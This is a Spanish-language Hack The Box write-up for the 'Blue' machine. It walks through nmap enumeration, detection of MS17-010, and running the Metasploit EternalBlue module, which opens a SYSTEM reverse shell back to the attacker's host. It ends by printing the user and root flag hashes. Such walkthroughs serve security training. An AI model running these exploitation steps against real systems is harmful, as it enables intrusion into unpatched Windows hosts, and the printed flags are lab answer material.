__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 

[HTB] Blue

Hoy vamos a hackear la maquina de HTB llamada Blue. Esta catalogada como facil.
  • Enumeration
  • sml@m0nikE:~/ctf/htb/machines/blue$ nmap -A -p- 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 17:12 CET Nmap scan report for 10.10.10.40 Host is up (0.036s latency). Not shown: 65526 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -4s, deviation: 1s, median: -5s | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2019-11-24T16:16:13+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-11-24T16:16:15 |_ start_date: 2019-11-24T16:11:25 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 265.92 seconds
    Vamos a investigar un poco mas el puerto 445 haciendo uso de los scripts de nmap para escanear las vulnerabilidades de smb.
    sml@m0nikE:/home/sml$ sudo nmap -sS --script smb-vuln* -p445 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 17:14 CET Nmap scan report for 10.10.10.40 Host is up (0.036s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannac rypt-attacks/ Nmap done: 1 IP address (1 host up) scanned in 13.12 seconds
    En la salida de nmap vemos que el servidor es vulnerable a: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) Asi que vamos a arrancar metasploit para aprovecharnos de la vulnerabilidad.
  • Exploitation
  • Buscamos el exploit smb-vuln-ms17-010 y configuramos metasploit para atacar al servidor.
    msf5 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection 2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization 3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40 rhosts => 10.10.10.40 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.10.14.13:4444 [+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 10.10.10.40:445 - Connecting to target for exploitation. [+] 10.10.10.40:445 - Connection established for exploitation. [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes) [*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet [*] 10.10.10.40:445 - Starting non-paged pool grooming [+] 10.10.10.40:445 - Sending SMBv2 buffers [+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.10.40:445 - Sending final SMBv2 buffers. [*] 10.10.10.40:445 - Sending last fragment of exploit packet! [*] 10.10.10.40:445 - Receiving response from exploit packet [+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.10.10.40:445 - Sending egg to corrupted connection. [*] 10.10.10.40:445 - Triggering free of corrupted buffer. [*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.40:49158) at 2019-11-24 17:16:37 +0100 [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    Vemos que se abre la sesion, ya estamos dentro.
    C:\Windows\system32>whoami whoami nt authority\system
    Con el comando whoami podemos ver que somos system, con lo cual tenemos privilegios.
  • user.txt
  • C:\>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911 Directory of C:\ 14/07/2009 03:20 PerfLogs 24/12/2017 02:23 Program Files 14/07/2017 16:58 Program Files (x86) 14/07/2017 13:48 Share 21/07/2017 06:56 Users 16/07/2017 20:21 Windows 0 File(s) 0 bytes 6 Dir(s) 15,365,468,160 bytes free C:\>cd users cd users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911 Directory of C:\Users 21/07/2017 06:56 . 21/07/2017 06:56 .. 21/07/2017 06:56 Administrator 14/07/2017 13:45 haris 12/04/2011 07:51 Public 0 File(s) 0 bytes 5 Dir(s) 15,365,468,160 bytes free C:\Users>cd haris cd haris C:\Users\haris>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911 Directory of C:\Users\haris 14/07/2017 13:45 . 14/07/2017 13:45 .. 15/07/2017 07:58 Contacts 24/12/2017 02:23 Desktop 15/07/2017 07:58 Documents 15/07/2017 07:58 Downloads 15/07/2017 07:58 Favorites 15/07/2017 07:58 Links 15/07/2017 07:58 Music 15/07/2017 07:58 Pictures 15/07/2017 07:58 Saved Games 15/07/2017 07:58 Searches 15/07/2017 07:58 Videos 0 File(s) 0 bytes 13 Dir(s) 15,365,468,160 bytes free C:\Users\haris>cd Desktop cd Desktop C:\Users\haris\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911 Directory of C:\Users\haris\Desktop 24/12/2017 02:23 . 24/12/2017 02:23 .. 21/07/2017 06:54 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 15,365,455,872 bytes free C:\Users\haris\Desktop>type user.txt type user.txt 4c546aea7dbee75cbd71de245c8deea9
  • root.txt
  • C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911 Directory of C:\Users 21/07/2017 06:56 . 21/07/2017 06:56 .. 21/07/2017 06:56 Administrator 14/07/2017 13:45 haris 12/04/2011 07:51 Public 0 File(s) 0 bytes 5 Dir(s) 15,365,468,160 bytes free C:\Users>cd Administrator cd Administrator C:\Users\Administrator>cd Desktop cd Desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911 Directory of C:\Users\Administrator\Desktop 24/12/2017 02:22 . 24/12/2017 02:22 .. 21/07/2017 06:57 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 15,365,468,160 bytes free C:\Users\Administrator\Desktop>type root.txt type root.txt ff548eb71e920ff6c08843ce9df4e717
  • End
  • Con esto ya tendriamos el control de la maquina.